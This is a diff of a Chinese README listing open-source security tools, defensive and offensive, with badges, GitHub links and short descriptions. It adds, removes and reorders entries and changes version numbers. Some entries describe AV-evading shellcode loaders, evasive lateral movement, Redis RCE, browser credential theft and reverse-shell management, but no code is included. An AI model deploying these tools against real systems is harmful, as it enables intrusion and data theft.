@@ -62,35 +36,27 @@
 * [内网工具/intranet_tools](#内网工具intranet_tools)
     * [fscan](#fscan)
     * [antSword](#antsword)
-    * [Stowaway](#stowaway)
-    * [shellcodeloader](#shellcodeloader)
     * [ServerScan](#serverscan)
+    * [Stowaway](#stowaway)
     * [Platypus](#platypus)
-    * [WMIHACKER](#wmihacker)
-    * [rakshasa](#rakshasa)
     * [As-Exploits](#as-exploits)
-    * [PortForward](#portforward)
 
 * [其他/others](#其他others)
-    * [f8x](#f8x)
-    * [BinAbsInspector](#binabsinspector)
     * [passive-scan-client](#passive-scan-client)
-    * [Heimdallr](#heimdallr)
-    * [wam](#wam)
-    * [LBot](#lbot)
+    * [f8x](#f8x)
 
 ----------------------------------------
 
 ## 甲方工具/party_a
-### [dperf](detail/dperf.md)
-![Author](https://img.shields.io/badge/Author-Benjamin-orange)
-![Language](https://img.shields.io/badge/Language-C-blue)
-![GitHub stars](https://img.shields.io/github/stars/baidu/dperf.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.5.0-red)
+### [OpenStar](detail/OpenStar.md)
+![Author](https://img.shields.io/badge/Author-starjun-orange)
+![Language](https://img.shields.io/badge/Language-JS/Python-blue)
+![GitHub stars](https://img.shields.io/github/stars/starjun/openstar.svg?style=flat&logo=github)
+![Version](https://img.shields.io/badge/Version-V1.0.0-red)
 
-<https://github.com/baidu/dperf>
+<https://github.com/starjun/openstar>
 
-dperf 是一个100Gbps的网络性能与压力测试软件。国内多个知名安全厂商用dperf测试其防火墙。知名开源四层负载均衡DPVS在用dperf做性能测试，发布性能测试报告。
+OpenStar 是一个基于 OpenResty 的高性能 Web 应用防火墙，支持复杂规则编写。提供了常规的 HTTP 字段规则配置，还提供了 IP 黑白名单、访问频次等配置，对于 CC 防护更提供的特定的规则算法，并且支持搭建集群进行防护。
 
 ### [Elkeid](detail/Elkeid.md)
 ![Author](https://img.shields.io/badge/Author-bytedance-orange)
@@ -112,65 +78,15 @@ Elkeid是一个云原生的基于主机的安全(入侵检测与风险识别)解
 
 linglong是一款甲方资产巡航扫描系统。系统定位是发现资产，进行端口爆破。帮助企业更快发现弱口令问题。主要功能包括: 资产探测、端口爆破、定时任务、管理后台识别、报表展示。
 
-### [veinmind-tools](detail/veinmind-tools.md)
-![Author](https://img.shields.io/badge/Author-长亭科技-orange)
-![Language](https://img.shields.io/badge/Language-Golang/Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/chaitin/veinmind-tools.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.1.5-red)
-
-<https://github.com/chaitin/veinmind-tools>
-
-veinmind-tools 是基于 veinmind-sdk 打造的一个容器安全工具集，目前已支持镜像 恶意文件/后门/敏感信息/弱口令 的扫描，更多功能正在逐步开发中。
-
-### [appshark](detail/appshark.md)
-![Author](https://img.shields.io/badge/Author-bytedance-orange)
-![Language](https://img.shields.io/badge/Language-Kotlin-blue)
-![GitHub stars](https://img.shields.io/github/stars/bytedance/appshark.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.1.2-red)
-
-<https://github.com/bytedance/appshark>
-
-Appshark 是一个针对安卓的静态分析工具，它的设计目标是针对超大型App的分析，Appshark支持基于json的自定义扫描规则,发现自己关心的安全漏洞以及隐私合规问题，支持灵活配置，可以在准确率以及扫描时间空间之间寻求平衡，支持自定义扩展规则，根据自己的业务需要，进行定制分析
-
-### [OpenStar](detail/OpenStar.md)
-![Author](https://img.shields.io/badge/Author-starjun-orange)
-![Language](https://img.shields.io/badge/Language-JS/Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/starjun/openstar.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.0.0-red)
-
-<https://github.com/starjun/openstar>
-
-OpenStar 是一个基于 OpenResty 的高性能 Web 应用防火墙，支持复杂规则编写。提供了常规的 HTTP 字段规则配置，还提供了 IP 黑白名单、访问频次等配置，对于 CC 防护更提供的特定的规则算法，并且支持搭建集群进行防护。
-
-### [camille](detail/camille.md)
-![Author](https://img.shields.io/badge/Author-zhengjim-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/zhengjim/camille.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
-
-<https://github.com/zhengjim/camille>
-
-现如今APP隐私合规十分重要，各监管部门不断开展APP专项治理工作及核查通报，不合规的APP通知整改或直接下架。camille可以hook住Android敏感接口，并识别是否为第三方SDK调用。根据隐私合规的场景，辅助检查是否符合隐私合规标准。
-
-### [murphysec](detail/murphysec.md)
-![Author](https://img.shields.io/badge/Author-murphysecurity-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/murphysecurity/murphysec.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.10.0-red)
-
-<https://github.com/murphysecurity/murphysec>
-
-墨菲安全专注于软件供应链安全，murphysec 是墨菲安全的 CLI 工具，用于在命令行检测指定目录代码的依赖安全问题，也可以基于 CLI 工具实现在 CI 流程的检测。
-
-### [GShark](detail/gshark.md)
+### [gshark](detail/gshark.md)
 ![Author](https://img.shields.io/badge/Author-madneal-orange)
 ![Language](https://img.shields.io/badge/Language-Golang-blue)
 ![GitHub stars](https://img.shields.io/github/stars/madneal/gshark.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.2.0-red)
+![Version](https://img.shields.io/badge/Version-V0.8.4-red)
 
 <https://github.com/madneal/gshark>
 
-一款开源敏感信息检测系统，可以监测包括 GitHub, GitLab(支持私有部署版本), Postman, searchcode 多个平台的敏感信息监测。
+一款开源敏感信息监测系统，可以监测包括 github、gitlab(目前不太稳定，由于gitlab对于免费用户不提供代码全文检索API)、searchcode 多平台的敏感信息监测。
 
 ### [Juggler](detail/Juggler.md)
 ![Author](https://img.shields.io/badge/Author-C4o-orange)
@@ -182,16 +98,6 @@ OpenStar 是一个基于 OpenResty 的高性能 Web 应用防火墙，支持复
 
 一个也许能骗到黑客的系统，可以作为WAF等防护体系的一环。
 
-### [Hades](detail/Hades.md)
-![Author](https://img.shields.io/badge/Author-theSecHunter-orange)
-![Language](https://img.shields.io/badge/Language-Golang&C++&C-blue)
-![GitHub stars](https://img.shields.io/github/stars/theSecHunter/Hades.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.1.0-red)
-
-<https://github.com/theSecHunter/Hades>
-
-Hades 是一款支持 Windows/Linux 的内核级别数据采集主机入侵检测系统，其中每个插件均可独立分开运行。
-
 
 
 ## 信息收集/reconnaissance
@@ -199,41 +105,31 @@ Hades 是一款支持 Windows/Linux 的内核级别数据采集主机入侵检
 ![Author](https://img.shields.io/badge/Author-kelvinBen-orange)
 ![Language](https://img.shields.io/badge/Language-Python-blue)
 ![GitHub stars](https://img.shields.io/github/stars/kelvinBen/AppInfoScanner.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.0.9-red)
+![Version](https://img.shields.io/badge/Version-V1.0.8-red)
 
 <https://github.com/kelvinBen/AppInfoScanner>
 
 一款适用于以HW行动/红队/渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具，可以帮助渗透测试工程师、攻击队成员、红队成员快速收集到移动端或者静态WEB站点中关键的资产信息并提供基本的信息输出,如：Title、Domain、CDN、指纹信息、状态信息等。
 
-### [ENScanGo](detail/ENScanGo.md)
-![Author](https://img.shields.io/badge/Author-wgpsec-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/wgpsec/ENScan_GO.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.15-red)
-
-<https://github.com/wgpsec/ENScan_GO>
-
-一款基于各大企业信息API的工具，解决在遇到的各种针对国内企业信息收集难题。一键收集控股公司ICP备案、APP、小程序、微信公众号等信息聚合导出。
-
 ### [HaE](detail/HaE.md)
 ![Author](https://img.shields.io/badge/Author-gh0stkey-orange)
 ![Language](https://img.shields.io/badge/Language-Java-blue)
 ![GitHub stars](https://img.shields.io/github/stars/gh0stkey/HaE.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.4.6-red)
+![Version](https://img.shields.io/badge/Version-V2.1.2-red)
 
 <https://github.com/gh0stkey/HaE>
 
 HaE是一款可以快速挖掘目标指纹和关键信息的Burp插件。
 
-### [Kunyu](detail/Kunyu.md)
-![Author](https://img.shields.io/badge/Author-风起-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/Kunyu.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.7.2-red)
+### [DarkEye](detail/DarkEye.md)
+![Author](https://img.shields.io/badge/Author-zsdevX-orange)
+![Language](https://img.shields.io/badge/Language-Golang-blue)
+![GitHub stars](https://img.shields.io/github/stars/zsdevX/DarkEye.svg?style=flat&logo=github)
+![Version](https://img.shields.io/badge/Version-V4.3.0-red)
 
-<https://github.com/knownsec/Kunyu>
+<https://github.com/zsdevX/DarkEye>
 
-Kunyu(坤舆)，是一款基于ZoomEye API开发的信息收集工具，旨在让企业资产收集更高效，使更多安全相关从业者了解、使用网络空间测绘技术。
+基于go完成的渗透测试信息收集利器
 
 ### [Glass](detail/Glass.md)
 ![Author](https://img.shields.io/badge/Author-s7ckTeam-orange)
@@ -245,56 +141,6 @@ Kunyu(坤舆)，是一款基于ZoomEye API开发的信息收集工具，旨在
 
 Glass是一款针对资产列表的快速指纹识别工具，通过调用Fofa/ZoomEye/Shodan/360等api接口快速查询资产信息并识别重点资产的指纹，也可针对IP/IP段或资产列表进行快速的指纹识别。
 
-### [ksubdomain](detail/ksubdomain.md)
-![Author](https://img.shields.io/badge/Author-w8ay-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/boy-hack/ksubdomain.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.9.5-red)
-
-<https://github.com/boy-hack/ksubdomain>
-
-ksubdomain是一款基于无状态子域名爆破工具，支持在Windows/Linux/Mac上使用，它会很快的进行DNS爆破，在Mac和Windows上理论最大发包速度在30w/s,linux上为160w/s的速度。
-
-### [scaninfo](detail/scaninfo.md)
-![Author](https://img.shields.io/badge/Author-华东360安服团队-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/redtoolskobe/scaninfo.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.1.0-red)
-
-<https://github.com/redtoolskobe/scaninfo>
-
-scaninfo 是一款开源、轻量、快速、跨平台的红队内外网打点扫描器。比较同类工具，其能够在 nmap 的扫描速度和 masscan 的准确度之间寻找一个较好的平衡点，能够快速进行端口扫描和服务识别，内置指纹识别用于 web 探测，可以用报告的方式整理扫描结果。
-
-### [ZoomEye-Python](detail/ZoomEye-Python.md)
-![Author](https://img.shields.io/badge/Author-Knownsec404-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/ZoomEye-python.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.2.0-red)
-
-<https://github.com/knownsec/ZoomEye-python>
-
-ZoomEye-python 是一款基于 ZoomEye API 开发的 Python 库，提供了 ZoomEye 命令行模式，同时也可以作为 SDK 集成到其他工具中。该库可以让技术人员更便捷地搜索、筛选、导出 ZoomEye 的数据
-
-### [ct](detail/ct.md)
-![Author](https://img.shields.io/badge/Author-rungobier@Knownsec404-orange)
-![Language](https://img.shields.io/badge/Language-Rust-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/ct.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.0.9-red)
-
-<https://github.com/knownsec/ct>
-
-ct 是一款使用 rust 语言进行开发，并且基于ZoomEye域名查询以及利用域名字典进行子域名爆破的工具，同时在最终爆破完成后可使用脚本，将相应的的.gv 文件转化成为相应的 .png 文件进行可视化展示
-
-### [Zoomeye-Tools](detail/ZoomEye-Tools.md)
-![Author](https://img.shields.io/badge/Author-Knownsec404-orange)
-![Language](https://img.shields.io/badge/Language-JS-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/Zoomeye-Tools.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.3.2-red)
-
-<https://github.com/knownsec/Zoomeye-Tools>
-
-一个配合ZoomEye使用的Chrome插件，可以查看当前网页所在ip信息或跳转查看详细信息，还可以根据关键词一键跳转至ZoomEye进行搜索
-
 ### [ZoomEye-go](detail/ZoomEye-go.md)
 ![Author](https://img.shields.io/badge/Author-gyyyy-orange)
 ![Language](https://img.shields.io/badge/Language-Golang-blue)
@@ -308,16 +154,6 @@ ZoomEye-go 是一款基于 ZoomEye API 开发的 Golang 库，提供了 ZoomEye
 
 
 ## 漏洞探测/vulnerability_assessment
-### [afrog](detail/afrog.md)
-![Author](https://img.shields.io/badge/Author-zan8in-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/zan8in/afrog.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.7.9-red)
-
-<https://github.com/zan8in/afrog>
-
-afrog 是一款性能卓越、快速稳定、PoC 可定制的漏洞扫描工具，PoC 包含 CVE、CNVD、默认口令、信息泄露、指纹识别、未授权访问、任意文件读取、命令执行等多种漏洞类型，帮助网络安全从业者快速验证并及时修复漏洞。
-
 ### [Kunpeng](detail/Kunpeng.md)
 ![Author](https://img.shields.io/badge/Author-opensec-orange)
 ![Language](https://img.shields.io/badge/Language-Golang-blue)
@@ -348,139 +184,39 @@ Pocassist 是一个 Golang 编写的全新开源漏洞测试框架，帮助安
 
 myscan是参考awvs的poc目录架构，pocsuite3、sqlmap等代码框架，以及搜集互联网上大量的poc，由python3开发而成的被动扫描工具。
 
-### [LSpider](detail/LSpider.md)
-![Author](https://img.shields.io/badge/Author-LoRexxar-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/LSpider.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.0.2-red)
-
-<https://github.com/knownsec/LSpider>
-
-LSpider 一个为被动扫描器定制的前端爬虫
-
 
 
 ## 攻击与利用/penetration_test
-### [dperf](detail/dperf.md)
-![Author](https://img.shields.io/badge/Author-Benjamin-orange)
-![Language](https://img.shields.io/badge/Language-C-blue)
-![GitHub stars](https://img.shields.io/github/stars/baidu/dperf.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.5.0-red)
-
-<https://github.com/baidu/dperf>
-
-dperf 是一个100Gbps的网络性能与压力测试软件。国内多个知名安全厂商用dperf测试其防火墙。知名开源四层负载均衡DPVS在用dperf做性能测试，发布性能测试报告。
-
-### [pocsuite3](detail/pocsuite3.md)
-![Author](https://img.shields.io/badge/Author-knownsec404-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/pocsuite3.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.0.4-red)
+### [CDK](detail/CDK.md)
+![Author](https://img.shields.io/badge/Author-cdkteam-orange)
+![Language](https://img.shields.io/badge/Language-CDK-blue)
+![GitHub stars](https://img.shields.io/github/stars/cdk-team/CDK.svg?style=flat&logo=github)
+![Version](https://img.shields.io/badge/Version-V1.0.4-red)
 
-<https://github.com/knownsec/pocsuite3>
+<https://github.com/cdk-team/CDK>
 
-pocsuite3是由Knownsec 404团队开发的开源远程漏洞测试和概念验证开发框架。它带有强大的概念验证引擎，以及针对最终渗透测试人员和安全研究人员的许多强大功能。
+CDK是一款为容器环境定制的渗透测试工具，在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。集成Docker/K8s场景特有的逃逸、横向移动、持久化利用方式，插件化管理。
 
 ### [Viper](detail/Viper.md)
 ![Author](https://img.shields.io/badge/Author-FunnyWolf-orange)
 ![Language](https://img.shields.io/badge/Language-JS/Python-blue)
 ![GitHub stars](https://img.shields.io/github/stars/FunnyWolf/Viper.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V20230827-red)
+![Version](https://img.shields.io/badge/Version-V1.5.5-red)
 
 <https://github.com/FunnyWolf/Viper>
 
 VIPER是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化。
 
-### [CDK](detail/CDK.md)
-![Author](https://img.shields.io/badge/Author-cdkteam-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/cdk-team/CDK.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.5.2-red)
-
-<https://github.com/cdk-team/CDK>
-
-CDK是一款为容器环境定制的渗透测试工具，在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。集成Docker/K8s场景特有的逃逸、横向移动、持久化利用方式，插件化管理。
-
 ### [MDUT](detail/MDUT.md)
 ![Author](https://img.shields.io/badge/Author-Ch1ngg-orange)
 ![Language](https://img.shields.io/badge/Language-Java-blue)
 ![GitHub stars](https://img.shields.io/github/stars/SafeGroceryStore/MDUT.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.1.1-red)
+![Version](https://img.shields.io/badge/Version-V2.0.7-red)
 
 <https://github.com/SafeGroceryStore/MDUT>
 
 MDUT 全称 Multiple Database Utilization Tools，旨在将常见的数据库利用手段集合在一个程序中，打破各种数据库利用工具需要各种环境导致使用相当不便的隔阂；MDUT 使用 Java 开发，支持跨平台使用。
 
-### [WMIHACKER](detail/WMIHACKER.md)
-![Author](https://img.shields.io/badge/Author-rootclay-orange)
-![Language](https://img.shields.io/badge/Language-VBScript-blue)
-![GitHub stars](https://img.shields.io/github/stars/rootclay/WMIHACKER.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
-
-<https://github.com/rootclay/WMIHACKER>
-
-WMIHACKER是一款免杀横向渗透远程命令执行工具，常见的WMIEXEC、PSEXEC执行命令是创建服务或调用Win32_Process.create执行命令，这些方式都已经被杀软100%拦截，通过改造出的WMIHACKER可免杀横向移动。并且在企业网络目前阻断445端口严重的情况下可以无需445端口进行横向移动，效率高且不易被检测。
-
-### [BurpCrypto](detail/BurpCrypto.md)
-![Author](https://img.shields.io/badge/Author-whwlsfb-orange)
-![Language](https://img.shields.io/badge/Language-Java-blue)
-![GitHub stars](https://img.shields.io/github/stars/whwlsfb/BurpCrypto.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
-
-<https://github.com/whwlsfb/BurpCrypto>
-
-支持多种加密算法或直接执行JS代码的用于爆破前端加密的BurpSuite插件。
-
-### [MySQL-Fake-Server](detail/MySQL-Fake-Server.md)
-![Author](https://img.shields.io/badge/Author-fnmsd-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/fnmsd/MySQL_Fake_Server.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
-
-<https://github.com/fnmsd/MySQL_Fake_Server>
-
-用于渗透测试过程中的假MySQL服务器，纯原生python3实现，不依赖其它包。
-
-### [ysomap](detail/ysomap.md)
-![Author](https://img.shields.io/badge/Author-wh1t3p1g-orange)
-![Language](https://img.shields.io/badge/Language-Java-blue)
-![GitHub stars](https://img.shields.io/github/stars/wh1t3p1g/ysomap.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.1.3-red)
-
-<https://github.com/wh1t3p1g/ysomap>
-
-Ysomap是一款适配于各类实际复杂环境的Java反序列化利用框架，可动态配置具备不同执行效果的Java反序列化利用链payload，以应对不同场景下的反序列化利用。
-
-### [Cloud-Bucket-Leak-Detection-Tools](detail/Cloud-Bucket-Leak-Detection-Tools.md)
-![Author](https://img.shields.io/badge/Author-UzJu-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/UzJu/Cloud-Bucket-Leak-Detection-Tools.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.4.0-red)
-
-<https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools>
-
-Cloud-Bucket-Leak-Detection-Tools是一款针对云厂商存储桶扫描检测与利用的工具
-
-### [DNSlog-GO](detail/DNSlog-GO.md)
-![Author](https://img.shields.io/badge/Author-lanyi-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/lanyi1998/DNSlog-GO.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.5.2-red)
-
-<https://github.com/lanyi1998/DNSlog-GO>
-
-DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具，自带WEB界面。单文件运行，无依赖。部署方便快捷。
-
-### [Antenna](detail/Antenna.md)
-![Author](https://img.shields.io/badge/Author-wuba-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/wuba/Antenna.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.3.5-red)
-
-<https://github.com/wuba/Antenna>
-
-Antenna是58同城安全团队打造的一款辅助安全从业人员辅助验证网络中多种漏洞是否存在以及可利用性的工具。其基于带外应用安全测试( OAST)通过任务的形式，将不同漏洞场景检测能力通过插件的形式进行集合，通过与目标进行Out-of-bind的数据通信方式进行辅助检测。
-
 ### [Redis-Rogue-Server](detail/Redis-Rogue-Server.md)
 ![Author](https://img.shields.io/badge/Author-Dliv3-orange)
 ![Language](https://img.shields.io/badge/Language-Python-blue)
@@ -491,16 +227,6 @@ Antenna是58同城安全团队打造的一款辅助安全从业人员辅助验
 
 Redis 4.x/Redis 5.x RCE利用脚本. 项目最初来源于 <https://github.com/n0b0dyCN/redis-rogue-server>
 
-### [Cola-Dnslog](detail/Cola-Dnslog.md)
-![Author](https://img.shields.io/badge/Author-AbelChe-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/AbelChe/cola_dnslog.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
-
-<https://github.com/AbelChe/cola_dnslog>
-
-Cola Dnslog 是一款更加强大的dnslog平台(无回显漏洞探测辅助平台)，支持dns http ldap rmi等协议，提供API调用方式便于与其他工具结合，支持钉钉机器人、Bark等提醒，并支持docker一键部署。
-
 ### [MysqlT](detail/MysqlT.md)
 ![Author](https://img.shields.io/badge/Author-BeichenDream-orange)
 ![Language](https://img.shields.io/badge/Language-C%23-blue)
@@ -511,16 +237,6 @@ Cola Dnslog 是一款更加强大的dnslog平台(无回显漏洞探测辅助平
 
 伪造Myslq服务端,并利用Mysql逻辑漏洞来获取客户端的任意文件反击攻击。
 
-### [JYso](detail/JYso.md)
-![Author](https://img.shields.io/badge/Author-qi4L-orange)
-![Language](https://img.shields.io/badge/Language-Java-blue)
-![GitHub stars](https://img.shields.io/github/stars/qi4L/JYso.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V3.4.0-red)
-
-<https://github.com/qi4L/JYso>
-
-JYso是一个可以用于 jndi 注入攻击和生成反序列化数据流的工具，既可以当 JNDIExploit 用也可以当作 ysoserial 使用。
-
 
 
 ## 信息分析/information_analysis
@@ -528,27 +244,17 @@ JYso是一个可以用于 jndi 注入攻击和生成反序列化数据流的工
 ![Author](https://img.shields.io/badge/Author-moonD4rk-orange)
 ![Language](https://img.shields.io/badge/Language-Golang-blue)
 ![GitHub stars](https://img.shields.io/github/stars/moonD4rk/HackBrowserData.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.4.4-red)
+![Version](https://img.shields.io/badge/Version-V0.3.6-red)
 
 <https://github.com/moonD4rk/HackBrowserData>
 
 hack-browser-data 是一个解密浏览器数据（密码/历史记录/Cookies/书签）的导出工具，支持全平台主流浏览器的数据导出窃取。
 
-### [KunLun-M](detail/KunLun-M.md)
-![Author](https://img.shields.io/badge/Author-LoRexxar-orange)
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![GitHub stars](https://img.shields.io/github/stars/LoRexxar/Kunlun-M.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.6.5-red)
-
-<https://github.com/LoRexxar/Kunlun-M>
-
-KunLun-M是一个完全开源的静态白盒扫描工具，支持PHP、JavaScript的语义扫描，基础安全、组件安全扫描，Chrome Ext\Solidity的基础扫描。
-
 ### [frida-skeleton](detail/frida-skeleton.md)
 ![Author](https://img.shields.io/badge/Author-Margular-orange)
 ![Language](https://img.shields.io/badge/Language-Python-blue)
 ![GitHub stars](https://img.shields.io/github/stars/Margular/frida-skeleton.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V3.3-red)
+![Version](https://img.shields.io/badge/Version-V2.0.0-red)
 
 <https://github.com/Margular/frida-skeleton>
 
@@ -591,7 +297,7 @@ CodeReviewTools是一个可以快速批量反编译jar包的工具，为审计Ja
 ![Author](https://img.shields.io/badge/Author-shadow1ng-orange)
 ![Language](https://img.shields.io/badge/Language-Golang-blue)
 ![GitHub stars](https://img.shields.io/github/stars/shadow1ng/fscan.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.8.2-red)
+![Version](https://img.shields.io/badge/Version-V1.6.3-red)
 
 <https://github.com/shadow1ng/fscan>
 
@@ -601,32 +307,12 @@ CodeReviewTools是一个可以快速批量反编译jar包的工具，为审计Ja
 ![Author](https://img.shields.io/badge/Author-AntSwordProject-orange)
 ![Language](https://img.shields.io/badge/Language-Nodejs-blue)
 ![GitHub stars](https://img.shields.io/github/stars/AntSwordProject/antSword.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.1.15-red)
+![Version](https://img.shields.io/badge/Version-V2.1.14-red)
 
 <https://github.com/AntSwordProject/antSword>
 
 中国蚁剑是一款开源的跨平台网站管理工具。
 
-### [Stowaway](detail/Stowaway.md)
-![Author](https://img.shields.io/badge/Author-ph4ntonn-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/ph4ntonn/Stowaway.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.1-red)
-
-<https://github.com/ph4ntonn/Stowaway>
-
-Stowaway 是一款多级代理工具，可将外部流量通过多个节点代理至内网，突破内网访问限制。Stowaway 可以方便渗透测试人员通过多级跳跃，从外部dmz等一系列区域逐步深入核心网络；Stowaway 除了流量转发功能，还提供了端口复用、ssh隧道，流量伪装等专为渗透测试人员所用的功能。
-
-### [shellcodeloader](detail/shellcodeloader.md)
-![Author](https://img.shields.io/badge/Author-m0ngo0se@knownsec404-orange)
-![Language](https://img.shields.io/badge/Language-C++-blue)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/shellcodeloader.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.1-red)
-
-<https://github.com/knownsec/shellcodeloader>
-
-Windows平台的shellcode免杀加载器，自带多种加载方式：32位自带13种加载方式，64位自带12种加载方式。
-
 ### [ServerScan](detail/ServerScan.md)
 ![Author](https://img.shields.io/badge/Author-Adminisme-orange)
 ![Language](https://img.shields.io/badge/Language-Golang-blue)
@@ -637,6 +323,16 @@ Windows平台的shellcode免杀加载器，自带多种加载方式：32位自
 
 一款使用Golang开发且适用于攻防演习内网横向信息收集的高并发网络扫描、服务探测工具。
 
+### [Stowaway](detail/Stowaway.md)
+![Author](https://img.shields.io/badge/Author-ph4ntonn-orange)
+![Language](https://img.shields.io/badge/Language-Golang-blue)
+![GitHub stars](https://img.shields.io/github/stars/ph4ntonn/Stowaway.svg?style=flat&logo=github)
+![Version](https://img.shields.io/badge/Version-V2.0.0-red)
+
+<https://github.com/ph4ntonn/Stowaway>
+
+Stowaway 是一款多级代理工具，可将外部流量通过多个节点代理至内网，突破内网访问限制。Stowaway 可以方便渗透测试人员通过多级跳跃，从外部dmz等一系列区域逐步深入核心网络；Stowaway 除了流量转发功能，还提供了端口复用、ssh隧道，流量伪装等专为渗透测试人员所用的功能。
+
 ### [Platypus](detail/Platypus.md)
 ![Author](https://img.shields.io/badge/Author-WangYihang-orange)
 ![Language](https://img.shields.io/badge/Language-Golang-blue)
@@ -647,26 +343,6 @@ Windows平台的shellcode免杀加载器，自带多种加载方式：32位自
 
 Platypus 是一个基于终端与 Web UI 交互式的反弹 Shell 会话管理工具。在实际的渗透测试中，为了解决 Netcat/Socat 等工具在文件传输、多会话管理方面的不足。该工具在多会话管理的基础上增加了在渗透测试中更加有用的功能，可以更方便灵活地对反弹 Shell 会话进行管理。
 
-### [WMIHACKER](detail/WMIHACKER.md)
-![Author](https://img.shields.io/badge/Author-rootclay-orange)
-![Language](https://img.shields.io/badge/Language-VBScript-blue)
-![GitHub stars](https://img.shields.io/github/stars/rootclay/WMIHACKER.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
-
-<https://github.com/rootclay/WMIHACKER>
-
-WMIHACKER是一款免杀横向渗透远程命令执行工具，常见的WMIEXEC、PSEXEC执行命令是创建服务或调用Win32_Process.create执行命令，这些方式都已经被杀软100%拦截，通过改造出的WMIHACKER可免杀横向移动。并且在企业网络目前阻断445端口严重的情况下可以无需445端口进行横向移动，效率高且不易被检测。
-
-### [rakshasa](detail/rakshasa.md)
-![Author](https://img.shields.io/badge/Author-Mob2003-orange)
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![GitHub stars](https://img.shields.io/github/stars/Mob2003/rakshasa.svg?style=flat&logo=github)
